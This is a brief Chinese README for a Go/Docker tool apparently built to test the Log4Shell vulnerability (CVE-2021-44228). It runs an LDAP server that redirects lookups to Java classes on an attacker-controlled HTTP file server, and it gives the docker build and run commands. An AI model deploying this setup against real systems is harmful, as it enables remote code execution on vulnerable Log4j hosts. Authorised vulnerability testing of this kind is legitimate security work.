一个简单的 Go 应用 / Docker 镜像,用于测试 CVE-2021-44228 漏洞。它托管一个简单的文件服务器和一个 LDAP 服务器,该 LDAP 服务器提供文件服务器上托管的任何类:ldap://ip:1389/Hello -> http://ip:8080/Hello.class
docker build -t log4shell .
docker run -it -v "path-to-classes:/files" -p 1389:1389 -p 8080:8080 -e HOST=localhost log4shell